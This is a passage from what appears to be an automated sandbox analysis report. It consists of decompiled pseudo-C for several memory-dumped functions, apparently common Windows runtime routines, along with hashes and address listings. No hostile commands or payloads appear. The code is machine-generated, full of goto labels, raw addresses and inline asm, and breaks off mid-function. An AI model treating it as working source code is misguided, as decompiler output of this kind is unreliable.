								_t87 = E02B2F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                        0x02af52a5
                        0x02af52ad
                        0x02af52b0
                        0x02af52b3
                        0x02af52b7
                        0x02af52ba
                        0x02af52bf
                        0x02af52c4
                        0x02af52cc
                        0x00000000
                        0x00000000
                        0x02af52ce
                        0x02af52d9
                        0x02af52dd
                        0x02af52e7
                        0x02af52f7
                        0x02af52f9
                        0x02af52fd
                        0x02b50dcf
                        0x02b50dd5
                        0x02b50dd6
                        0x02b50dd7
                        0x02b50dd8
                        0x02b50dd9
                        0x02b50dde
                        0x02b50ddf
                        0x02b50de0
                        0x02b50de1
                        0x02b50de2
                        0x02b50de5
                        0x02b50dea
                        0x02b50dec
                        0x02b50f60
                        0x02b50f64
                        0x02b50f70
                        0x02b50f76
                        0x02b50f79
                        0x02b50f79
                        0x00000000
                        0x02b50f64
                        0x02b50df2
                        0x02b50df7
                        0x02b50e04
                        0x02b50e0d
                        0x02b50e0d
                        0x02b50e10
                        0x02b50e1a
                        0x02b50e1c
                        0x02b50e4c
                        0x02b50e52
                        0x02b50e61
                        0x02b50e67
                        0x02b50e6b
                        0x02b50e70
                        0x02b50e76
                        0x02b50ed7
                        0x02b50edc
                        0x02b50ee0
                        0x02b50ee6
                        0x02b50eea
                        0x02b50eed
                        0x02b50ef0
                        0x02b50ef3
                        0x02b50ef6
                        0x02b50ef9
                        0x02b50efe
                        0x02b50f01
                        0x02b50f01
                        0x02b50f0b
                        0x02b50f12
                        0x02b50f16
                        0x02b50f18
                        0x02b50f1b
                        0x02b50f2c
                        0x02b50f31
                        0x02b50f31
                        0x02b50f35
                        0x02b50f39
                        0x02b50f3a
                        0x02b50f3c
                        0x02b50f3f
                        0x02b50f50
                        0x02b50f55
                        0x02b50f55
                        0x02b50f59
                        0x02af52eb
                        0x02af52f1
                        0x02af52f1
                        0x02b50e7d
                        0x02b50e84
                        0x02b50e88
                        0x02b50e8a
                        0x02b50e8d
                        0x02b50e9e
                        0x02b50ea3
                        0x02b50ea3
                        0x02b50ea7
                        0x02b50eaf
                        0x02b50eb3
                        0x02b50eb9
                        0x02b50eb9
                        0x02b50ebc
                        0x02b50ecd
                        0x02b50ecd
                        0x00000000
                        0x02b50eb3
                        0x02b50e21
                        0x02b50e2b
                        0x02b50e2f
                        0x02b50e30
                        0x02b50e3a
                        0x02b50e3f
                        0x02b50e41
                        0x00000000
                        0x00000000
                        0x02b50e47
                        0x00000000
                        0x02b50e47
                        0x02b50df9
                        0x02b50dfe
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b50dfe
                        0x02af5303
                        0x02af5307
                        0x00000000
                        0x02af5309
                        0x00000000
                        0x02af5309
                        0x02af5307
                        0x02af52e9
                        0x02af52e9
                        0x00000000
                        0x02af52e9
                        0x02af530e
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b252fdabbb66580589fa5bdbfa4e094d8c961566c52584a743626a8a78c076f4
                        • Instruction ID: 7605394dba98a054a30826b93aeb1da1ed3f4eaebd2e83a965a13d801c608f92
                        • Opcode Fuzzy Hash: b252fdabbb66580589fa5bdbfa4e094d8c961566c52584a743626a8a78c076f4
                        • Instruction Fuzzy Hash: 3751DD31505741ABD722EF68C880B27FBE5FF58710F100D9AF9968B691EB74E844CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B22AE4, Relevance: .2, Instructions: 159COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B22AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x2be8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x2be8208; // 0x2be8207
				_t8 = _t57 + 0x2be8208; // 0x2be8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x2be8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x2be821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x2be6d5c; // 0x7fa20654
							_t72 =  *0x2be6d5c; // 0x7fa20654
							_t75 =  *0x2be6d5c; // 0x7fa20654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x2be6d5c; // 0x7fa20654
							_t84 =  *0x2be6d5c; // 0x7fa20654
							_t87 =  *0x2be6d5c; // 0x7fa20654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E02B3F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                        0x02b22ae4
                        0x02b22aec
                        0x02b22aef
                        0x02b22af4
                        0x02b22af7
                        0x02b22afd
                        0x02b22b92
                        0x02b22b92
                        0x02b22b97
                        0x02b22b9c
                        0x02b22b9c
                        0x02b22b03
                        0x02b22b06
                        0x02b22b09
                        0x02b22b09
                        0x02b22b0f
                        0x02b22b15
                        0x02b22b15
                        0x02b22b1b
                        0x02b22b1e
                        0x02b22b21
                        0x02b22b26
                        0x02b22b29
                        0x02b22b81
                        0x02b22b84
                        0x02b22c0e
                        0x02b22c15
                        0x02b22c24
                        0x02b22c24
                        0x02b22b8a
                        0x02b22b8a
                        0x02b22b8a
                        0x02b22b8a
                        0x02b22b90
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b22b4a
                        0x02b22b4a
                        0x02b22b4d
                        0x02b22b53
                        0x00000000
                        0x00000000
                        0x02b22b55
                        0x02b22b58
                        0x02b22bb7
                        0x02b65d1b
                        0x02b65d37
                        0x02b65d47
                        0x02b65d53
                        0x02b22bbd
                        0x02b22bbd
                        0x02b22bbd
                        0x02b22bb7
                        0x02b22b5d
                        0x02b22c2f
                        0x02b65d5b
                        0x02b65d77
                        0x02b65d87
                        0x02b65d93
                        0x02b22c35
                        0x02b22c35
                        0x02b22c35
                        0x02b22c2f
                        0x02b22b65
                        0x02b22b9f
                        0x02b22ba2
                        0x02b22b67
                        0x02b22b67
                        0x02b22b69
                        0x02b22b6b
                        0x02b22b6e
                        0x02b22bc9
                        0x02b22bcc
                        0x02b22bcf
                        0x02b22bd4
                        0x02b22bd6
                        0x02b22bd6
                        0x02b22bdb
                        0x02b22c02
                        0x02b22c05
                        0x02b22c07
                        0x00000000
                        0x02b22c07
                        0x02b22be0
                        0x02b22c00
                        0x02b22c3f
                        0x02b22c3f
                        0x00000000
                        0x02b22c00
                        0x02b22be5
                        0x02b22be7
                        0x02b22bec
                        0x02b22bf4
                        0x02b22bf6
                        0x00000000
                        0x02b22bf6
                        0x02b22b70
                        0x02b22b76
                        0x02b22b2b
                        0x02b22b2b
                        0x02b22b2d
                        0x02b22b2f
                        0x02b22b32
                        0x02b22b35
                        0x02b22b3a
                        0x00000000
                        0x02b22b40
                        0x02b22b43
                        0x02b22b45
                        0x02b22b47
                        0x02b22b4a
                        0x02b22b4d
                        0x02b22b53
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b22b53
                        0x02b22b78
                        0x02b22b78
                        0x02b22b7b
                        0x02b22b7e
                        0x00000000
                        0x02b22b7e
                        0x02b22b76
                        0x02b22ba5
                        0x02b22ba5
                        0x02b22ba8
                        0x02b22bad
                        0x00000000
                        0x00000000
                        0x02b22baf
                        0x02b22baf
                        0x02b22bc2
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c81cbaec442d6e487ff03c3bcfea2f36b48fc0250f7f750eb75dabfeae1203fa
                        • Instruction ID: 848d0c3c5d8115312417226de907b28f6f29ad966ca208cbf2080d4e5d558c32
                        • Opcode Fuzzy Hash: c81cbaec442d6e487ff03c3bcfea2f36b48fc0250f7f750eb75dabfeae1203fa
                        • Instruction Fuzzy Hash: 6C51C276E00225CFCB18DF2DC8849BDB7B1FB88700716859AEC4ADB364D734AA55CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BBAE44, Relevance: .2, Instructions: 152COMMON
                        Download Yara Rule
                        C-Code - Quality: 86%
                        			E02BBAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E02BBC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E02BBACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E02BBFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E02BBEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E02B17D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E02BB1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E02BC1536(0x2be8ae4, (_t74 -  *0x2be8b04 >> 0x14) + (_t74 -  *0x2be8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L02BBC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E02BBA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E02B9CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E02BBACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                        0x02bbae44
                        0x02bbae4c
                        0x02bbae53
                        0x02bbae55
                        0x02bbae5c
                        0x02bbae64
                        0x02bbae68
                        0x02bbae75
                        0x02bbae75
                        0x02bbae78
                        0x02bbae7a
                        0x02bbae7c
                        0x02bbae7f
                        0x02bbaea8
                        0x02bbaeab
                        0x02bbaead
                        0x00000000
                        0x00000000
                        0x02bbaeb3
                        0x02bbaeb8
                        0x02bbaebb
                        0x02bbaebd
                        0x00000000
                        0x02bbae81
                        0x02bbae88
                        0x02bbae8f
                        0x02bbae9b
                        0x02bbae96
                        0x02bbae96
                        0x02bbae96
                        0x02bbaea0
                        0x02bbaea3
                        0x02bbaebf
                        0x02bbaebf
                        0x02bbaec3
                        0x02bbaec9
                        0x02bbaf0d
                        0x02bbaf14
                        0x02bbaf3d
                        0x02bbaf3d
                        0x02bbaf41
                        0x02bbaf44
                        0x02bbaf67
                        0x02bbaf67
                        0x02bbaf6a
                        0x02bbafca
                        0x02bbafd1
                        0x00000000
                        0x02bbafd1
                        0x02bbaf6c
                        0x02bbaf6d
                        0x02bbaf75
                        0x02bbaf7c
                        0x02bbaf7e
                        0x02bbaf80
                        0x02bbaf85
                        0x02bbaf87
                        0x02bbaf99
                        0x02bbaf89
                        0x02bbaf92
                        0x02bbaf92
                        0x02bbaf9e
                        0x02bbafa1
                        0x02bbafa3
                        0x02bbafa9
                        0x02bbafb0
                        0x02bbafb2
                        0x02bbafb4
                        0x02bbafbc
                        0x02bbafbc
                        0x02bbafb4
                        0x02bbafb0
                        0x00000000
                        0x02bbafa1
                        0x02bbaf4f
                        0x02bbaf57
                        0x02bbaf5c
                        0x02bbaf5e
                        0x00000000
                        0x00000000
                        0x02bbaf60
                        0x02bbaf64
                        0x02bbaf64
                        0x00000000
                        0x02bbaf64
                        0x02bbaf1a
                        0x02bbaf25
                        0x00000000
                        0x00000000
                        0x02bbaf27
                        0x02bbaf28
                        0x02bbaf33
                        0x00000000
                        0x02bbaed0
                        0x02bbaed0
                        0x02bbaed2
                        0x02bbaee1
                        0x02bbaee4
                        0x00000000
                        0x00000000
                        0x02bbaee6
                        0x02bbaeec
                        0x00000000
                        0x00000000
                        0x02bbaefb
                        0x02bbaf07
                        0x02bbafd3
                        0x02bbafdb
                        0x02bbafdb
                        0x00000000
                        0x02bbaf07
                        0x02bbaed6
                        0x02bbaed8
                        0x02bbaedf
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bbaedf
                        0x02bbaec9

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2311aed1c1e8b980a0f89ad0931bd3f5398c7a5ad64986a51f7e3a319d6caf96
                        • Instruction ID: 182a08fbb11bf2d01191b6d8c1be32aad71455f02e02b8ade04dd3580c77d01f
                        • Opcode Fuzzy Hash: 2311aed1c1e8b980a0f89ad0931bd3f5398c7a5ad64986a51f7e3a319d6caf96
                        • Instruction Fuzzy Hash: 26410A72F006519FCB27DA29C898BFBB79AEF84714F144299F856C7290DBB4D801CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B1DBE9, Relevance: .1, Instructions: 149COMMON
                        Download Yara Rule
                        C-Code - Quality: 86%
                        			E02B1DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E02AFCC50(E02AF4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E02B17D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E02BC8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E02B12280(_t58, _v44);
						E02B1DD82(_v44, _t102, _t98);
						E02B1B944(_t102, _v5);
						return E02B0FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x2be8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x2be862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x2be8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x2be862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x2bbfb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                        0x02b1dbe9
                        0x02b1dbf2
                        0x02b1dbf7
                        0x02b1dbf9
                        0x02b1dbfc
                        0x02b1dc00
                        0x02b1dc03
                        0x02b1dc14
                        0x02b1dd54
                        0x02b1dd54
                        0x02b1dd54
                        0x02b1dc18
                        0x02b1dc1d
                        0x02b1dc1d
                        0x02b1dc32
                        0x02b1dc3b
                        0x02b1dc3e
                        0x02b1dc46
                        0x02b1dd5b
                        0x02b1dd62
                        0x02b1dd64
                        0x02b1dd67
                        0x02b1dd69
                        0x02b1dd6b
                        0x02b1dd6e
                        0x02b1dd70
                        0x02b1dd73
                        0x02b1dd73
                        0x00000000
                        0x02b1dc4c
                        0x02b1dc4e
                        0x02b63ae3
                        0x02b63ae8
                        0x02b63aea
                        0x02b1dce7
                        0x02b1dce9
                        0x02b1dcec
                        0x02b1dcee
                        0x02b1dcf0
                        0x02b1dcf3
                        0x02b1dcf5
                        0x02b63af2
                        0x02b63af5
                        0x02b63af5
                        0x02b1dd06
                        0x02b1dd08
                        0x02b1dd0b
                        0x02b1dd12
                        0x02b63b08
                        0x02b1dd18
                        0x02b1dd18
                        0x02b1dd18
                        0x02b1dd20
                        0x02b1dd23
                        0x02b63b16
                        0x02b63b16
                        0x02b1dd29
                        0x02b1dd2d
                        0x02b1dd36
                        0x02b1dd40
                        0x02b1dd51
                        0x02b1dd51
                        0x02b1dc54
                        0x02b1dc59
                        0x02b1dc59
                        0x02b1dc5e
                        0x02b1dc5e
                        0x02b1dc63
                        0x02b1dc66
                        0x02b1dc6b
                        0x02b1dc78
                        0x02b1dc7b
                        0x02b1dc81
                        0x02b1dc81
                        0x02b1dc83
                        0x02b1dc89
                        0x00000000
                        0x00000000
                        0x02b1dd7b
                        0x02b1dd7b
                        0x02b1dc8f
                        0x02b1dc8f
                        0x02b1dc92
                        0x02b1dc99
                        0x02b1dc9f
                        0x02b1dca5
                        0x02b1dcaa
                        0x02b1dcaa
                        0x02b1dcb3
                        0x02b1dcb8
                        0x02b1dcbb
                        0x02b1dcc1
                        0x02b1dccf
                        0x02b1dcd2
                        0x02b1dcd5
                        0x02b1dcd7
                        0x02b1dcda
                        0x02b1dcdc
                        0x02b1dcdc
                        0x02b1dce2
                        0x02b1dce4
                        0x00000000
                        0x02b1dce4

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8fe9abbc4c5300ff0d8100e4bf4484728ab3188fe8afc57e8e20430b6d044862
                        • Instruction ID: ebabde2c6ccfcce4c8ded2040435983c2279b3cd1a262473464adae4fd57a2b5
                        • Opcode Fuzzy Hash: 8fe9abbc4c5300ff0d8100e4bf4484728ab3188fe8afc57e8e20430b6d044862
                        • Instruction Fuzzy Hash: E5519FB1A01616DFCB14DFA8C480BAEFBF2FB49350F20859AD555AB340DB35A944CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B0EF40, Relevance: .1, Instructions: 147COMMON
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E02B0EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E02AF9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E02AF2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
